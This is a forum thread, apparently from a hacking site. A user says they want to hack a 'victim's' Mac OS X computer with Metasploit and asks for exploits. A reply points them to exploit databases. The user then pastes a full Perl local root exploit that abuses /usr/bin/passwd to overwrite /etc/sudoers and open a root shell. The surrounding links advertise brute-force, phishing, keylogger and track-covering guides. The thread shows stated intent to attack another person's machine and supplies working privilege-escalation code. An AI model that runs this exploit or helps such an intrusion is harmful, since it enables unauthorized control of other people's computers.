Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
What Are Some Good Budget Laptops for Pentestin
12
Replies
1 day ago -
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
8
Replies
1 day ago -
Forum Thread:
Hack Instagram Account Using BruteForce
193
Replies
1 day ago -
Forum Thread:
Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?
117
Replies
3 days ago -
Forum Thread:
How Do I Access Different Directories Within Android via Meterpreter
5
Replies
5 days ago -
Forum Thread:
Best Programming Language?
8
Replies
1 wk ago -
Forum Thread:
HACK ANDROID with KALI USING PORT FORWARDING(portmap.io)
4
Replies
1 wk ago -
Forum Thread:
Fix Meterpreter Problem
2
Replies
1 wk ago -
Forum Thread:
Hack and Track People's Device Constantly Using TRAPE
31
Replies
1 wk ago -
Forum Thread:
Need Help with FatRat Over WAN
1
Replies
2 wks ago -
Forum Thread:
Kali Linux Boot Error
8
Replies
2 wks ago -
Forum Thread:
I Want to Hack in to My Friends System Through his wifi router i am controlling
8
Replies
2 wks ago -
Forum Thread:
Kali linux command error. Kindly help
3
Replies
2 wks ago -
Forum Thread:
How to Create a Python Remote Keylogger for Facebook
27
Replies
2 wks ago -
Forum Thread:
Kali Linux Handshake Porblem
2
Replies
2 wks ago -
Forum Thread:
Port Forwarding Problem in Metasploit Can't Establish Connection (WAN)
3
Replies
2 wks ago -
Forum Thread:
GMail Brute Force Dictionary Attack Script
31
Replies
3 wks ago -
Forum Thread:
Msfvenom Android Exploitation Outside LAN?
12
Replies
4 wks ago -
Forum Thread:
How to decrypt .CAP file of handshake during WiFi attack
2
Replies
4 wks ago -
Forum Thread:
Make a Phishing Page for Harvesting Credentials Yourself
7
Replies
1 mo ago
-
How To:
Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected
-
How To:
Make Spoofed Calls Using Any Phone Number You Want Right from Your Smartphone
-
How To:
Master Python, Django, Git & GitHub with This Bundle
-
How To:
Phish for Social Media & Other Account Passwords with BlackEye
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
Android for Hackers:
How to Turn an Android Phone into a Hacking Device Without Root
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
Hack Like a Pro:
How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite
-
How To:
Crack Shadow Hashes After Getting Root on a Linux System
-
How To:
Automate Wi-Fi Hacking with Wifite2
-
How to Hack Wi-Fi:
Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To:
Scan for Vulnerabilities on Any Website Using Nikto
-
How To:
Upgrade a Dumb Shell to a Fully Interactive Shell for More Flexibility
-
How To:
Hack Android Using Kali (Remotely)
-
Hack Like a Pro:
How to Find Directories in Websites Using DirBuster
-
How To:
Brute-Force SSH, FTP, VNC & More with BruteDum
-
How To:
Brute-Force Nearly Any Website Login with Hatch
-
How To:
Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
-
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts